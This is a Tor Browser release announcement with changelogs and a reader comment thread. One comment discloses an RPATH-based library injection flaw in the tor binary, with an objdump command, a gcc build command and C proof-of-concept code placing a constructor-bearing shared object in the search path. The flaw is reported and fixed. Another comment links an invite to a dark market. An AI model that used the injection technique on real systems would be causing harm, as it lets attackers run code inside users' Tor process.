Tor Browser 3.6.5 and 4.0-alpha-2 are released

Tor Browser 3.6.5

The fifth pointfix release of the 3.6 series is available from the Tor Browser Project page and also from our distribution directory.

This release features important security updates to Firefox.

This release also features improvements to the canvas image extraction permissions prompt, and will now log offending script urls to the browser console. It also restores the missing RELRO hardening option to the Linux bundles, and disables NTLM and Negotiate HTTP auth (which can leak sensitive information about the computer). To avoid resolution fingerprinting, popups are also opened in new tabs by default.

Here is the complete changelog for 3.6.5:

All Platforms
- Update Firefox to 24.8.0esr
- Update NoScript to 2.6.8.39
- Update HTTPS Everywhere to 4.0.0
- Update Torbutton to 1.6.12.1
  - Bug 12684: New strings for canvas image extraction message
  - Bug 8940: Move RecommendedTBBVersions file to www.torproject.org
  - Bug 9531: Workaround to avoid rare hangs during New Identity
- Bug 12684: Improve Canvas image extraction permissions prompt
- Bug 7265: Only prompt for first party canvas access. Log all scripts
  that attempt to extract canvas images to Browser console.
- Bug 12974: Disable NTLM and Negotiate HTTP Auth
- Bug 2874: Remove Components.* from content access (regression)
- Bug 9881: Open popups in new tabs by default
Linux:
- Bug 12103: Adding RELRO hardening back to browser binaries.

Tor Browser 4.0-alpha-2

In addition, we are also releasing the second alpha in the 4.0 series, available for download on the extended downloads page.

This release also includes important security updates to Firefox.

In addition to including the changes in 3.6.5, this release also is the first Tor Browser release to enable the in-browser Firefox-based updater. This means that if all goes well, 4.0-alpha-2 users will notified of an available update via a notification similar to that in Firefox. You will then be able to download and install it directly via the browser UI. By default, neither the download nor the update will happen automatically, so if you are not feeling adventurous, you need not allow it to update in this way. Even if you are feeling adventurous, you should probably back up your Tor Browser directory before updating.

In addition to the updater, this release should also re-enable the basic hardening features on Windows, including ASLR, DEP, and SSP.

Furthermore, the NoScript behavior in this release has changed. Selecting "Temporarily allow scripts" will now automatically allow all scripts in a page. This was done for usability reasons, to make it easier for novice users to run Tor Browser with scripting disabled most of the time. This will also hopefully make it possible for more people to use the "High Security" setting in our upcoming Security Slider, which will have Javascript disabled globally via NoScript by default.

Here is the complete changelog for 4.0-alpha-2:

All Platforms
- Update Firefox to 24.8.0esr
- Update NoScript to 2.6.8.39
- Update Tor Launcher to 0.2.7.0
  - Bug 11405: Remove firewall prompt from wizard.
  - Bug 12895: Mention @riseup.net as a valid bridge request email address
  - Bug 12444: Provide feedback when “Copy Tor Log” is clicked.
  - Bug 11199: Improve error messages if Tor exits unexpectedly
- Update Torbutton to 1.6.12.1
  - Bug 12684: New strings for canvas image extraction message
  - Bug 8940: Move RecommendedTBBVersions file to www.torproject.org
- Bug 12684: Improve Canvas image extraction permissions prompt
- Bug 7265: Only prompt for first party canvas access. Log all scripts
  that attempt to extract canvas images to Browser console.
- Bug 12974: Disable NTLM and Negotiate HTTP Auth
- Bug 2874: Remove Components.* from content access (regression)
- Bug 4234: Automatic Update support (off by default)
- Bug 9881: Open popups in new tabs by default
- Meek Pluggable Transport:
  - Bug 12766: Use TLSv1.0 in meek-http-helper to blend in with Firefox 24
Windows:
- Bug 10065: Enable DEP, ASLR, and SSP hardening options
Linux:
- Bug 12103: Adding RELRO hardening back to browser binaries.

The list of frequently encountered known issues is also available in our bug tracker.

Is automatic update secure

Is automatic update secure from man-in-the-middle or perform some kind of hash or GPG signature verification?

We pin the certificate of

We pin the certificate of the update server and planned are signed updates, too. For all the fancy things in the pipeline see: https://trac.torproject.org/projects/tor/query?status=!closed&keywords=…

PLEASE SOMEONE FIND A WAY TO

PLEASE SOMEONE FIND A WAY TO BYPASS CLOUDFLARE, THANKS

سلام چرا این

سلام چرا این فیلترین کار نمیکند

This new Tor Browser Bundle

This new Tor Browser Bundle is ignoring the ExcludeNodes and ExcludeExitNodes settings that I have put in torrc. Why is it doing this? Have you changed the syntax to exclude nodes or is something else going on here?

We did not change anything I

We did not change anything I am aware of. Anyway, this is https://bugs.torproject.org/13051.

The alpha 64-bit version is

The alpha 64-bit version is giving the out of date browser warning. Should that just be ignored?

Still? No, it shouldn't be

Still?

No, it shouldn't be ignored. If it's still complaining now, collect more details and file a ticket?

In terms of matching

In terms of matching Mozilla's release cycle, CONGRATS to the team!!

Now when I see Firefox updates and look through the list of security vulnerabilities patched, there isn't a period of time before TBB gets updated that I'm nervous about using TBB as my primary browser.

This makes a difference for TBB users' safety--thanks!

Thanks so much for your

Thanks so much for your selfless dedication,Tor is working very well in china now.

Well, great! Do you mean

Well, great!

Do you mean using a pluggable transport like meek, or does it work out-of-the-box for you?

not meek,but scramblesuit

not meek,but scramblesuit etc!!

very nice improvement i hope

very nice improvement i hope we see it stable very soon with obfs4 enabled :)

Since it was just profiled

Since it was just profiled in Wired yesterday, here's an invite link to the Agora Dark Market:

http://pastebin.com/4Kat4twA

Almighty Perry™ & Almighty Dingledine™, keep this post up and I will donate $10 in bitcoins. Oh yeah, keep up the excellent work. :^)

it's called Agora like tor

it's called Agora like tor project staff's pseudonym isis Agora lovecruft? coincidence?

To complement the new

To complement the new upgrade functionality, was thinking how nice it could be to have a changelog summarizing features added and new features listed automatically after upgrades occured.Since this information gets always listed on blogs and in git would you be willing to allow volunteers to build this functionality?

Where should that changelog

Where should that changelog get added and the new features get listed? In a new browser window or...?

Currently

Currently https://check.torproject.org/RecommendedTBBVersions gives

<br />
[<br />
"3.6.5-Linux",<br />
"3.6.5-MacOS",<br />
"3.6.5-Windows",<br />
"4.0-alpha-2-Linux",<br />
"4.0-alpha-2-MacOS",<br />
"4.0-alpha-2-Windows"<br />
]<br />

but https://www.torproject.org/projects/torbrowser/RecommendedTBBVersions gives

<br />
[<br />
"3.6.5-Linux",<br />
"3.6.5-MacOS",<br />
"3.6.5-Windows",<br />
"4.0-alpha-2",<br />
"4.0-alpha-2-Linux",<br />
"4.0-alpha-2-MacOS",<br />
"4.0-alpha-2-Windows"<br />
]<br />

It sais I should download a

It sais I should download a new version of TBB, but the download page only gives me 3.6.4, which results in a 404. 3.6.5. is downloadable, but only if you change the url...

Try now.

On the download page, there

On the download page, there is still the TBB version 3.6.4 available. Please fix that. I do not want to download an old version, I want the new one! By the way, such errors are a little bit embarrassing for such advanced developers like you.

Should be resolved (have

Should be resolved (have been resolved) earlier today.

What the hey is Tor doing on

What the hey is Tor doing on start-up?

1) In the first few minutes, it hogs 50% of CPU. At the same time, Firefox 32 coasts by on only 5% CPU with ten tabs open. Tor Browser only has one tab open, namely about:tor. Why so CPU-hungry?

2) In the first minutes, hundreds and hundreds of kilobytes are being UPloaded by Tor Browser, apparently to "entry guards". Vastly more uploading than downloading. Why is this happening?

3) I am right now downloading the TBB 3.6.5. Apparently, this download comes not from torproject.org but from a site called toastworld.org. (According to the network monitoring function in my Task Manager.) Who or what is toastworld and why is Tor Browser downloading from it?

I have only ever downloaded TBB from torproject.org, never from a third party site. Every time a new version is issued, I delete the entire Tor Browser folder and create a new one.

My computer is running Windows 7 SP1, with all updates installed as they come out. Standard firewall settings. Anti-virus is Microsoft Security Essentials, I also run EMET 5.0. Never had a virus on this machine, scan of the computer comes up clean.

I connect to the Web using a HUAWEI UMTS modem (E3531).

sounds like you've been

sounds like you've been owned. i suggest you use tails instead.

Does not sound like he has

Does not sound like he has been 'owned' to me, since I got this behavior on a totally clean and fresh Windows 8 when I was looking at what TOR was sending out.

It is more TOR thrashing on first boot like any obfuscation program does.

I am the owner of

I am the owner of toastworld.org
Toastworld.org is a Tor-node like thousand others. I have no idea what you did, but it looks like you are downloading TBB via Tor through my server.

Correction to my previous

Correction to my previous post: the connection to toastworld.org was not yet the actual download but instead happened after I clicked on "Download Tor Browser Bundle Update..." in the drop-down menu from the blinking onion icon. (No page was loaded.)

There is a tor relay running

There is a tor relay running on toastworld.org (79.140.41.117) which has the "guard" flag: https://atlas.torproject.org/#details/7DB67BE87F87525D5792CEC0F8A0011F5…

It looks like your computer has picked this as one of your guard nodes. Hence the download through tor happens via a connection to toastworld.org.

Thanks, that answers

Thanks, that answers question #3. Now can I please have an answer about the first two questions... especially the second?

What about disabling rc4 to

What about disabling rc4 to force the browser to use stronger ciphers by default ? Jake has warned repeatedly that rc4 is broken . Has there been any discussion on this

I know it could make users more susceptible to fingerprinting but if it can be broken in real time it is no protection anyway. Also some sites may only allow rc4 still so maybe a fallback mode could be implemented to re-enable rc4 on a site if all other ciphers are rejected first assuming you can catch the failed cipher negotiation attempts for the stronger ciphers .

I would be interested to hear your thoughts on this

Thank you to all the team. You all are hero's. You are enabling change and saving lives. I can't emphasize this enough! You all rock!

I have warned tor repeatedly

I have warned tor repeatedly that RSA 1024 is broken. They refuse to change it.

- BlackSam

isn't mozilla retiring

isn't mozilla retiring 1024-bit certs in FF32? not sure about the latest ESR build upon which TBB is based, but please consider trying the cipherfox add-on

I can't enter in ask.fm

I have the same problem,

I have the same problem, when I ever use tor browser I get blocked by ask.fm with the message (No robots allowed !).

Still looking for a solution.

When the "canvas image"

When the "canvas image" popup appears, should we click the "x" in the corner, "not now" option, or "never for this site (recomended)"? Choosing the never option would create a fingerprinting problem, woudln't it? But if we click the x in the corner, does it protect us?
Thanks

Clicking the "x" and "not

Clicking the "x" and "not now" should give you the same result. So both is fine. Why should the "never" option create a fingerprinting possibility? Because there is much less latency involved when using this option than clicking "x" or "not now"?

Several months ago i noticed

Several months ago i noticed that Tor has a very handy RPATH... implying a vulnerability that affects all TBBs.
$ objdump -x tor | grep RPATH
RPATH /home/ubuntu/install/openssl/lib:/home/ubuntu/install/libevent/lib

It's easy to create a home directory /home/ubuntu readable by all, and use it to inject dynamic linking libraries (shared objects) into the Tor process. Just by recompiling OpenSSL or libevent with some extra code... Then whoever launches an instance of the tor process from the local machine will execute that injected code, without noticing anything.
Funny thing, is that only the Tor software will have the code injected. So that it isn't the same thing as replacing the system's libc.

You made the perfect honeypot. Any other system administrator could have exploited this bug as i did. I wonder what the NSA is able to do against such a toy. Programmed by unskilled monkeys and checked out by the iSEC Partners... the most handicapped tards ever. Thanks.

Without recompiling anything here's a simple demo, just to prevent the TTB from starting.
gcc -shared -fPIC src.c -o /home/ubuntu/install/libevent/lib/libevent-2.0.so.5

<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
__attribute__ ((constructor)) void noobs()<br />
{<br />
    fprintf(stderr, "Boom! Harmless demo...\n");<br />
    abort();<br />
}<br />
void evhttp_bind_listener(){};<br />
void evhttp_accept_socket_with_handle(){};<br />
void evhttp_uri_set_path(){};<br />
void evhttp_find_header(){};<br />
void evhttp_connection_set_max_body_size(){};<br />
void evhttp_add_server_alias(){};<br />
void evhttp_uri_parse_with_flags(){};<br />
void evhttp_connection_set_max_headers_size(){};<br />
void evhttp_request_new(){};<br />
void evhttp_send_page(){};<br />
void evhttp_connection_get_base(){};<br />
void evhttp_connection_set_retries(){};<br />
void evhttp_connection_free(){};<br />
void evhttp_connection_get_bufferevent(){};<br />
void evhttp_request_get_uri(){};<br />
void evhttp_accept_socket(){};<br />
void evhttp_uri_set_port(){};<br />
void evhttp_make_request(){};<br />
void evhttp_connection_new(){};<br />
void evhttp_parse_headers(){};<br />
void evhttp_connection_connect(){};<br />
void evhttp_uri_get_userinfo(){};<br />
void evhttp_set_cb(){};<br />
void evhttp_connection_get_peer(){};<br />
void evhttp_connection_set_timeout(){};<br />
void evhttp_uri_get_path(){};<br />
void evhttp_request_own(){};<br />
void evhttp_new(){};<br />
void evhttp_start_read(){};<br />
void evhttp_request_free(){};<br />
void evhttp_request_get_connection(){};<br />
void evhttp_uri_get_query(){};<br />
void evhttp_clear_headers(){};<br />
void evhttp_uri_set_host(){};<br />
void evhttp_decode_uri(){};<br />
void evhttp_uri_set_flags(){};<br />
void evhttp_uri_get_port(){};<br />
void evhttp_send_error(){};<br />
void evhttp_uridecode(){};<br />
void evhttp_set_max_headers_size(){};<br />
void evhttp_cancel_request(){};<br />
void evhttp_request_get_input_buffer(){};<br />
void evhttp_bind_socket_with_handle(){};<br />
void evhttp_send_reply(){};<br />
void evhttp_connection_base_new(){};<br />
void evhttp_bound_socket_get_fd(){};<br />
void evhttp_start(){};<br />
void evhttp_uriencode(){};<br />
void evhttp_encode_uri(){};<br />
void evhttp_connection_set_closecb(){};<br />
void evhttp_set_max_body_size(){};<br />
void evhttp_bind_socket(){};<br />
void evhttp_parse_query(){};<br />
void evhttp_remove_server_alias(){};<br />
void evhttp_send_reply_chunk(){};<br />
void evhttp_request_get_output_buffer(){};<br />
void evhttp_send_reply_start(){};<br />
void evhttp_request_is_owned(){};<br />
void evhttp_uri_set_fragment(){};<br />
void evhttp_remove_virtual_host(){};<br />
void evhttp_request_get_response_code(){};<br />
void evhttp_request_get_host(){};<br />
void evhttp_remove_header(){};<br />
void evhttp_uri_get_host(){};<br />
void evhttp_connection_set_local_address(){};<br />
void evhttp_uri_join(){};<br />
void evhttp_uri_set_scheme(){};<br />
void evhttp_response_code(){};<br />
void evhttp_connection_reset(){};<br />
void evhttp_request_get_command(){};<br />
void evhttp_uri_new(){};<br />
void evhttp_uri_parse(){};<br />
void evhttp_request_get_input_headers(){};<br />
void evhttp_set_gencb(){};<br />
void evhttp_request_set_chunked_cb(){};<br />
void evhttp_uri_free(){};<br />
void evhttp_connection_set_base(){};<br />
void evhttp_htmlescape(){};<br />
void evhttp_connection_set_local_port(){};<br />
void evhttp_request_get_output_headers(){};<br />
void evhttp_connection_fail(){};<br />
void evhttp_parse_query_str(){};<br />
void evhttp_del_cb(){};<br />
void evhttp_uri_get_fragment(){};<br />
void evhttp_free(){};<br />
void evhttp_add_virtual_host(){};<br />
void evhttp_send_reply_end(){};<br />
void evhttp_bound_socket_get_listener(){};<br />
void evhttp_set_allowed_methods(){};<br />
void evhttp_uri_set_query(){};<br />
void evhttp_uri_set_userinfo(){};<br />
void evhttp_uri_get_scheme(){};<br />
void evhttp_set_timeout(){};<br />
void evhttp_request_get_evhttp_uri(){};<br />
void evhttp_add_header(){};<br />
void evhttp_parse_firstline(){};<br />
void evhttp_del_accept_socket(){};<br />
void evdns_base_search_ndots_set(){};<br />
void evdns_shutdown(){};<br />
void evdns_server_request_respond(){};<br />
void evdns_close_server_port(){};<br />
void evdns_count_nameservers(){};<br />
void evdns_nameserver_ip_add(){};<br />
void evdns_server_request_add_ptr_reply(){};<br />
void evdns_server_request_add_cname_reply(){};<br />
void evdns_resolve_reverse_ipv6(){};<br />
void evdns_set_log_fn(){};<br />
void evdns_nameserver_add(){};<br />
void evdns_getaddrinfo_cancel(){};<br />
void evdns_set_transaction_id_fn(){};<br />
void evdns_server_request_get_requesting_addr(){};<br />
void evdns_search_add(){};<br />
void evdns_clear_nameservers_and_suspend(){};<br />
void evdns_base_set_option(){};<br />
void evdns_base_clear_nameservers_and_suspend(){};<br />
void evdns_getaddrinfo(){};<br />
void evdns_set_option(){};<br />
void evdns_add_server_port(){};<br />
void evdns_set_random_bytes_fn(){};<br />
void evdns_base_nameserver_add(){};<br />
void evdns_server_request_drop(){};<br />
void evdns_search_clear(){};<br />
void evdns_server_request_add_a_reply(){};<br />
void evdns_base_search_add(){};<br />
void evdns_server_request_set_flags(){};<br />
void evdns_base_resume(){};<br />
void evdns_init(){};<br />
void evdns_server_request_add_aaaa_reply(){};<br />
void evdns_base_new(){};<br />
void evdns_get_global_base(){};<br />
void evdns_cancel_request(){};<br />
void evdns_resolve_ipv4(){};<br />
void evdns_base_resolve_reverse_ipv6(){};<br />
void evdns_resolve_ipv6(){};<br />
void evdns_search_ndots_set(){};<br />
void evdns_base_resolv_conf_parse(){};<br />
void evdns_resolv_conf_parse(){};<br />
void evdns_base_load_hosts(){};<br />
void evdns_base_free(){};<br />
void evdns_err_to_string(){};<br />
void evdns_base_search_clear(){};<br />
void evdns_base_resolve_reverse(){};<br />
void evdns_base_nameserver_sockaddr_add(){};<br />
void evdns_base_resolve_ipv4(){};<br />
void evdns_base_resolve_ipv6(){};<br />
void evdns_add_server_port_with_base(){};<br />
void evdns_base_count_nameservers(){};<br />
void evdns_server_request_add_reply(){};<br />
void evdns_base_nameserver_ip_add(){};<br />
void evutil_set_evdns_getaddrinfo_fn(){};<br />
void evdns_resolve_reverse(){};<br />
void evdns_resume(){};<br />
void event_set_log_callback(){};<br />
void event_deferred_cb_schedule(){};<br />
void event_deferred_cb_queue_init(){};<br />
void event_changelist_add(){};<br />
void event_get_callback_arg(){};<br />
void event_enable_debug_mode(){};<br />
void event_base_add_virtual(){};<br />
void event_changelist_freemem(){};<br />
void event_warnx(){};<br />
void event_config_set_num_cpus_hint(){};<br />
void event_mm_calloc_(){};<br />
void event_new(){};<br />
void event_err(){};<br />
void event_global_setup_locks_(){};<br />
void event_assign(){};<br />
void event_base_get_features(){};<br />
void event_get_base(){};<br />
void event_get_callback(){};<br />
void event_initialized(){};<br />
void event_changelist_remove_all(){};<br />
void event_reinit(){};<br />
void event_config_set_flag(){};<br />
void event_del(){};<br />
void event_base_priority_init(){};<br />
void event_mm_malloc_(){};<br />
void event_active(){};<br />
void event_config_free(){};<br />
void event_mm_realloc_(){};<br />
void event_base_free(){};<br />
void event_get_version(){};<br />
void event_base_gettimeofday_cached(){};<br />
void event_base_set(){};<br />
void event_get_fd(){};<br />
void event_get_supported_methods(){};<br />
void event_dispatch(){};<br />
void event_base_init_common_timeout(){};<br />
void event_changelist_del(){};<br />
void event_base_loopbreak(){};<br />
void event_base_del_virtual(){};<br />
void event_init(){};<br />
void event_errx(){};<br />
void event_base_dispatch(){};<br />
void event_pending(){};<br />
void event_debug_unassign(){};<br />
void event_set_mem_functions(){};<br />
void event_warn(){};<br />
void event_base_dump_events(){};<br />
void event_get_struct_event_size(){};<br />
void event_base_stop_iocp(){};<br />
void event_config_new(){};<br />
void event_base_loop(){};<br />
void event_sock_warn(){};<br />
void event_free(){};<br />
void event_priority_set(){};<br />
void event_get_events(){};<br />
void event_config_require_features(){};<br />
void event_base_once(){};<br />
void event_get_method(){};<br />
void event_set(){};<br />
void event_base_got_break(){};<br />
void event_set_fatal_callback(){};<br />
void event_get_assignment(){};<br />
void event_msgx(){};<br />
void event_loopbreak(){};<br />
void event_config_avoid_method(){};<br />
void event_sock_err(){};<br />
void event_global_current_base_(){};<br />
void event_active_nolock(){};<br />
void event_deferred_cb_init(){};<br />
void event_loopexit(){};<br />
void event_deferred_cb_cancel(){};<br />
void event_base_got_exit(){};<br />
void event_loop(){};<br />
void event_base_assert_ok(){};<br />
void event_changelist_init(){};<br />
void event_base_new(){};<br />
void event_base_start_iocp(){};<br />
void event_base_new_with_config(){};<br />
void event_once(){};<br />
void event_mm_strdup_(){};<br />
void event_get_version_number(){};<br />
void event_add(){};<br />
void event_priority_init(){};<br />
void event_base_loopexit(){};<br />
void event_base_get_method(){};<br />
void event_debug_map_HT_GROW(){};<br />
void event_base_get_deferred_cb_queue(){};<br />
void event_debug_map_HT_CLEAR(){};<br />
void event_mm_free_(){};<br />

Thanks for your courtesy and

Thanks for your courtesy and your concern. I have filed https://trac.torproject.org/projects/tor/ticket/13062 for this issue.

There is no RPATH available

There is no RPATH available anymore in tor since https://bugs.torproject.org/9150 landed a couple of days ago. Thus, this will be fixed in the next release.

Thats likely the reason why

Thats likely the reason why it was posted in the end.

For the record I got to know that Firefox has at least a yet to be "publicly discovered" exploit that allows remote code execution through javascript. I don't know which OS is affected nor whether DEP+ASLR are able to mitigate said exploit (who knows, perhaps they can). However the Tor Browser is yet to keep javascript off by default. I believe that Tor Project's refusal to start the browser with javascript off is the only bug (but really a backdoor) that the Tor Project has consciously left in Tor.

I tried Vidalia i686

I tried Vidalia i686 downloaded from https://people.torproject.org/~erinn/vidalia-standalone-bundles/ and find it slowly start when the TBB successfully connected to Tor Network, It will be faster start before the TBB has done connection

I noticed this same issue.

I noticed this same issue. Start up Vidalia at the same time or soon after TBB starts and it will connect quickly to the TOR instance running.
Wait a few minutes or start it up minutes after TBB starts running and it can take 2 minutes to load.

where can we download orfox

where can we download orfox from for testing?

https://guardianproject.info/

https://guardianproject.info/builds/OrfoxFennec/

Dear Tor

Dear Tor developers,

recently I read an interview with a Tor dev on BBC's website in which he says that sometimes some NSA employees leak bugs to developers. The interview can be found here:
http://www.bbc.com/news/technology-28886462

I wouldn't trust people who work for intelligence agencies at all. According to a document leaked by Edward Snowden, that's exactly what the NSA wants. Since they cannot break it, they try to "shape" and influence Tor's design, and I couldn't think of a better way to do it:
http://arstechnica.com/security/2013/10/nsa-repeatedly-tries-to-unpeel-…

Maybe they pretend to be privacy-conscious NSA employees and reveal purely theoretical bugs or weaknesses in order to persuade you to change Tor's design in a way that opens the doors to more serious vulnerabilities, that you're obviously not aware of. Please, be careful with these "tips" coming from those NSA's "good samaritans". They aren't good samaritans, otherwise they wouldn't work for the NSA.

There Are No Friendly

There Are No Friendly Intelligence Services.

Okay, I hate to say this but

Okay, I hate to say this but perhaps it is time to put a minimum speed allowed on nodes? There are a TON of nodes showing using Vidalia's Network Map function that have 1KB as the limitation for the node.

This is an obvious attempt at a denial of service attack against TOR and these nodes need to be banned. An example is NotAVirus, frenchfrog, EdwardSnowden41, default, and dalton.

Those 5 have 0KB's as their node limitation and at least 20 in the list above them have 1KB as their node limitation. Maybe it is time to limit running a node to having 300KB's minimum available for the node.